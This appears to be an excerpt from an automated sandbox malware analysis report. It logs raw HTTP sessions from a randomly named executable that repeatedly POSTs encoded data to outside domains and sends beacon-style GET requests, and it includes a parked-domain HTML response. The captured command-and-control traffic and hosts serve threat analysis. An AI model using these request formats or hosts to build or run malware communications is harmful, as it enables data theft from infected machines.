                                                              Sep 11, 2024 22:57:13.475203991 CEST442OUTGET /7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSA HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.legitima.legal
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:57:13.948204994 CEST1236INHTTP/1.1 200 OK
                                                              Server: hcdn
                                                              Date: Wed, 11 Sep 2024 20:57:13 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 10072
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: b41aa8e963314f27d29eb3f2e9d5f75e-bos-edge2
                                                              Expires: Wed, 11 Sep 2024 20:57:12 GMT
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                              Sep 11, 2024 22:57:13.948276997 CEST224INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                                                              Sep 11, 2024 22:57:13.948288918 CEST1236INData Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                                                              Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                                                              Sep 11, 2024 22:57:13.948384047 CEST1236INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                                                              Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                                                              Sep 11, 2024 22:57:13.948395014 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                                                              Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                                                              Sep 11, 2024 22:57:13.948406935 CEST1236INData Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                              Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                                                              Sep 11, 2024 22:57:13.948420048 CEST1236INData Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
                                                              Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
                                                              Sep 11, 2024 22:57:13.948514938 CEST1236INData Raw: 73 65 71 75 65 6e 63 65 22 29 3b 72 3d 28 28 31 30 32 33 26 72 29 3c 3c 31 30 29 2b 28 31 30 32 33 26 65 29 2b 36 35 35 33 36 7d 6e 2e 70 75 73 68 28 72 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b
                                                              Data Ascii: sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fr
                                                              Sep 11, 2024 22:57:13.948525906 CEST1236INData Raw: 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 33 29 22 29 3b 61 2b 3d 4d 61
                                                              Data Ascii: length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase
                                                              Sep 11, 2024 22:57:13.948537111 CEST300INData Raw: 2e 22 29 7d 2c 74 68 69 73 2e 54 6f 55 6e 69 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61
                                                              Data Ascii: .")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElementById("pathName"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.75970235.214.33.204805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:19.167165995 CEST711OUTPOST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 6f 35 55 4e 67 6e 78 75 76 73 66 6e 61 38 68 79 73 7a 59 49 47 35 39 6e 36 4b 37 54 72 59 6a 2b 35 6d 73 69 6a 69 59 64 62 71 31 47 53 72 64 46 76 34 54 6f 6a 4e 35 78 6c 39 6b 39 34 59 51 32 45 73 74 55 54 62 59 65 4f 6c 4c 49 6d 61 6b 64 4d 36 47 78 66 69 65 4a 61 4a 64 75 6d 74 64 44 62 48 4b 66 4b 30 41 50 66 37 78 2f 50 36 42 37 77 43 7a 34 35 65 46 30 47 42 61 2b 6f 6d 51 4f 2f 31 74 54 6b 56 47 2f 41 4b 6d 63 4d 4c 49 44 35 4e 5a 58 6e 66 75 31 50 6e 49 52 43 2b 71 63 49 32 37 46 42 6e 66 58 71 6b 62 74 79 6a 6e 75 74 49 54 32 35 37 53 4a 48 32 2b 58 49 55 37 69 2f 77 6d 6f 4a 72 45 43 72 58 61 6f 66 38 67 6b 55 67 3d 3d
                                                              Data Ascii: XvhP6L=o5UNgnxuvsfna8hyszYIG59n6K7TrYj+5msijiYdbq1GSrdFv4TojN5xl9k94YQ2EstUTbYeOlLImakdM6GxfieJaJdumtdDbHKfK0APf7x/P6B7wCz45eF0GBa+omQO/1tTkVG/AKmcMLID5NZXnfu1PnIRC+qcI27FBnfXqkbtyjnutIT257SJH2+XIU7i/wmoJrECrXaof8gkUg==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.75970335.214.33.204805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:21.716075897 CEST731OUTPOST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 6f 35 55 4e 67 6e 78 75 76 73 66 6e 49 73 52 79 71 55 30 49 52 4a 38 56 6b 61 37 54 69 34 6a 36 35 6d 67 69 6a 6e 30 33 62 59 68 47 53 50 52 46 73 35 54 6f 7a 64 35 78 71 64 6b 43 38 59 51 48 45 73 78 71 54 65 59 65 4f 6c 66 49 6d 62 55 64 4d 72 47 2b 65 79 65 50 57 70 64 67 35 39 64 44 62 48 4b 66 4b 30 6b 6c 66 34 42 2f 49 4c 78 37 77 67 62 2f 77 2b 46 37 57 52 61 2b 69 32 51 4b 2f 31 74 78 6b 55 61 56 41 4d 69 63 4d 4b 34 44 33 34 35 55 75 66 75 37 43 48 4a 4f 4f 63 6a 67 48 57 47 37 47 32 6e 58 74 47 32 58 7a 56 36 4d 33 71 66 61 6e 71 71 79 44 30 61 68 66 79 6d 58 39 78 69 77 45 4a 77 6a 30 67 2f 43 53 75 42 67 43 5a 6a 4f 63 69 47 45 64 71 44 7a 6d 55 74 36 79 47 36 75 2f 53 38 3d
                                                              Data Ascii: XvhP6L=o5UNgnxuvsfnIsRyqU0IRJ8Vka7Ti4j65mgijn03bYhGSPRFs5Tozd5xqdkC8YQHEsxqTeYeOlfImbUdMrG+eyePWpdg59dDbHKfK0klf4B/ILx7wgb/w+F7WRa+i2QK/1txkUaVAMicMK4D345Uufu7CHJOOcjgHWG7G2nXtG2XzV6M3qfanqqyD0ahfymX9xiwEJwj0g/CSuBgCZjOciGEdqDzmUt6yG6u/S8=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.75970435.214.33.204805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:24.261996031 CEST1744OUTPOST /i118/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.autochemtools.com
                                                              Origin: http://www.autochemtools.com
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.autochemtools.com/i118/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 6f 35 55 4e 67 6e 78 75 76 73 66 6e 49 73 52 79 71 55 30 49 52 4a 38 56 6b 61 37 54 69 34 6a 36 35 6d 67 69 6a 6e 30 33 62 59 35 47 53 61 4e 46 76 61 4c 6f 77 64 35 78 6e 39 6b 48 38 59 51 67 45 73 70 32 54 65 6b 4f 4f 6d 6e 49 6e 35 73 64 62 4a 75 2b 52 79 65 50 65 4a 64 68 6d 74 63 58 62 48 61 62 4b 30 55 6c 66 34 42 2f 49 49 70 37 35 53 7a 2f 38 65 46 30 47 42 61 49 6f 6d 51 69 2f 31 56 62 6b 55 4f 76 41 38 43 63 4d 71 6f 44 31 4c 52 55 76 2f 75 35 44 48 4a 47 4f 63 2f 46 48 56 6a 4b 47 32 54 39 74 46 6d 58 79 79 33 72 68 72 2f 39 78 73 32 30 41 53 2b 6a 59 7a 4f 6c 35 48 62 50 45 71 59 71 34 33 6d 39 62 64 64 58 50 74 4b 51 45 68 32 78 45 72 4c 33 72 7a 31 71 75 47 4b 54 39 32 62 68 68 41 31 47 6d 6c 52 70 30 68 75 76 2f 63 73 44 51 73 49 58 52 61 2b 55 6b 4c 6a 5a 30 39 55 54 73 4d 59 66 58 61 4f 50 48 7a 52 6e 35 51 69 46 4c 37 70 67 5a 66 33 38 65 6a 78 34 55 57 6f 57 4a 38 71 34 32 33 4e 74 35 4d 35 50 64 38 61 64 43 56 54 6a 54 6f 75 41 31 32 53 32 4e 46 70 75 6b 59 55 [TRUNCATED]
                                                              Data Ascii: XvhP6L=o5UNgnxuvsfnIsRyqU0IRJ8Vka7Ti4j65mgijn03bY5GSaNFvaLowd5xn9kH8YQgEsp2TekOOmnIn5sdbJu+RyePeJdhmtcXbHabK0Ulf4B/IIp75Sz/8eF0GBaIomQi/1VbkUOvA8CcMqoD1LRUv/u5DHJGOc/FHVjKG2T9tFmXyy3rhr/9xs20AS+jYzOl5HbPEqYq43m9bddXPtKQEh2xErL3rz1quGKT92bhhA1GmlRp0huv/csDQsIXRa+UkLjZ09UTsMYfXaOPHzRn5QiFL7pgZf38ejx4UWoWJ8q423Nt5M5Pd8adCVTjTouA12S2NFpukYU0mqyNSnQv3tFUBk54BbBp3nN6X/a6xZbylKvb/TCw9M1x4V7HuPz7XxCdo1v34kyEB7ETyWwCBcpEI9X0+IJMf/YZecV4tzJRvNpLCs3772Q2gvHMmjlMVq/NADJS3GohieWr7Tx2sBl/mQala6bsrwNpnerHipi+8JluJZAMYiYQCCn3iByB2skQE+Vj6rbvLA1Gl2+SI6ot8zdrU/SRYK5yrCSBnQyUFBZNBd4Q2x+oIorEI4zIB4OgUb/H7jX0+i6LA0XW89RL4NAh47BuxmQAc28r/KN9vHZu8bMNrmHtcQt/rQrVt2BZNgmYtNZvUYaarsrNTa8dkOyRtplmZVXIT7CEMciPDxXxY66mGEs7f6f4QXH3HjneQQmbXY5zqVoISowvmWZWnHD9ThQ8cFJ3e5ILw1bU4Hp9DF9WAHt43nd+nU/MJ4fIdrxGmTrIAYBEza1nzJYX/pG1hahd90OPbtcLMakzLjpkzEElPfzl2dhstS6Nygsz7eTyLeok7FusYxKcZ2SMVZkXouqTI30PSSkwhEVWax6BH9zz0mU9QAwTYbgUzt0oRUf6PW0KypDneSgpT51P4Z+lIYpEqzSjaK2pjBPcUCJ9GjLBha9CSdWH6297rFYRGaSqwE+nj1UMxGrisRlUjY50ddEKBwePwnmy66wWj [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.75970535.214.33.204805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:26.800091028 CEST445OUTGET /i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.autochemtools.com
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.7597063.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:32.564100027 CEST717OUTPOST /ufia/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 2b 50 69 55 32 4e 33 63 52 54 47 33 52 48 53 64 39 64 67 32 79 57 4c 79 59 6b 38 34 6a 7a 5a 53 74 73 71 31 58 54 49 38 4e 6f 45 53 44 79 2f 67 59 41 4e 5a 59 50 52 6a 4c 6b 6a 64 59 59 6e 41 36 6a 36 72 74 57 38 64 64 65 4b 64 4c 36 7a 74 51 75 31 56 74 72 59 49 37 33 68 49 78 58 72 6f 78 55 76 70 55 6a 35 47 30 36 57 69 55 32 58 53 54 56 70 65 61 50 2b 4c 68 46 74 34 76 79 38 38 31 4a 64 35 30 32 33 59 66 38 30 58 31 74 48 39 51 4b 61 6e 67 63 39 45 44 6b 62 65 45 45 71 78 52 39 4f 7a 6a 38 69 41 51 49 4d 47 4e 68 7a 4c 76 6a 61 41 46 33 56 66 4c 36 2f 71 77 6e 30 4e 63 7a 79 53 74 4f 77 36 69 71 66 43 63 32 39 68 59 67 3d 3d
                                                              Data Ascii: XvhP6L=+PiU2N3cRTG3RHSd9dg2yWLyYk84jzZStsq1XTI8NoESDy/gYANZYPRjLkjdYYnA6j6rtW8ddeKdL6ztQu1VtrYI73hIxXroxUvpUj5G06WiU2XSTVpeaP+LhFt4vy881Jd5023Yf80X1tH9QKangc9EDkbeEEqxR9Ozj8iAQIMGNhzLvjaAF3VfL6/qwn0NczyStOw6iqfCc29hYg==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.7597073.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:35.100337982 CEST737OUTPOST /ufia/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 2b 50 69 55 32 4e 33 63 52 54 47 33 65 45 4b 64 78 61 30 32 7a 32 4c 31 55 45 38 34 78 7a 5a 57 74 73 32 31 58 52 6b 73 4e 36 67 53 41 54 50 67 5a 43 6c 5a 64 50 52 6a 41 45 6a 59 63 59 6e 4c 36 6a 33 65 74 55 59 64 64 61 69 64 4c 36 6a 74 52 64 4e 55 2f 4c 59 4b 39 33 68 4b 76 6e 72 6f 78 55 76 70 55 6a 38 62 30 2b 43 69 56 47 48 53 63 52 39 5a 63 2f 2b 4d 6d 46 74 34 72 79 38 34 31 4a 64 68 30 7a 58 79 66 2f 4d 58 31 6f 37 39 51 37 61 6b 70 63 39 47 4f 45 61 70 4d 68 33 62 57 66 43 58 6e 71 79 55 4b 34 4d 73 4d 58 75 70 31 42 57 73 62 6d 74 6b 50 34 62 63 6e 42 70 34 65 79 32 4b 67 73 45 62 39 64 36 6f 52 6b 63 6c 4f 63 62 30 73 56 49 6b 33 42 5a 39 67 6a 52 72 45 61 4c 36 36 33 30 3d
                                                              Data Ascii: XvhP6L=+PiU2N3cRTG3eEKdxa02z2L1UE84xzZWts21XRksN6gSATPgZClZdPRjAEjYcYnL6j3etUYddaidL6jtRdNU/LYK93hKvnroxUvpUj8b0+CiVGHScR9Zc/+MmFt4ry841Jdh0zXyf/MX1o79Q7akpc9GOEapMh3bWfCXnqyUK4MsMXup1BWsbmtkP4bcnBp4ey2KgsEb9d6oRkclOcb0sVIk3BZ9gjRrEaL6630=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.7597083.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:57:37.649007082 CEST1750OUTPOST /ufia/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.thewhitediamond.org
                                                              Origin: http://www.thewhitediamond.org
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.thewhitediamond.org/ufia/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 2b 50 69 55 32 4e 33 63 52 54 47 33 65 45 4b 64 78 61 30 32 7a 32 4c 31 55 45 38 34 78 7a 5a 57 74 73 32 31 58 52 6b 73 4e 36 6f 53 41 6c 62 67 59 6c 52 5a 61 50 52 6a 65 30 6a 6a 63 59 6e 61 36 6a 75 57 74 55 6b 6e 64 59 61 64 49 5a 37 74 57 73 4e 55 6d 37 59 4b 78 58 68 4a 78 58 72 48 78 55 2f 74 55 6a 4d 62 30 2b 43 69 56 44 4c 53 59 46 70 5a 48 2f 2b 4c 68 46 74 38 76 79 39 76 31 4a 31 78 30 7a 62 49 66 4f 73 58 30 49 4c 39 41 59 79 6b 6d 63 39 41 41 6b 61 78 4d 68 7a 41 57 66 4f 62 6e 71 75 2b 4b 2f 41 73 4e 32 76 6d 77 44 43 74 59 6c 52 63 50 72 66 47 6e 78 4a 57 51 54 4b 78 6d 39 6b 53 7a 61 6a 54 59 79 6b 66 44 62 66 32 77 46 49 78 75 43 46 55 75 53 45 66 42 50 6a 79 70 52 42 62 66 2b 78 48 54 68 55 31 72 46 62 2f 4b 37 76 62 7a 67 73 7a 79 44 66 56 67 6c 7a 69 32 7a 4e 32 6d 32 68 33 72 72 32 39 4e 6e 48 37 6d 33 52 39 65 65 6a 6a 36 7a 53 31 34 48 39 6a 36 70 50 4c 6e 4e 78 6b 41 47 36 68 34 6a 64 44 78 44 69 30 41 63 4b 5a 63 76 57 73 6a 47 76 6c 62 49 55 6f 30 73 41 [TRUNCATED]
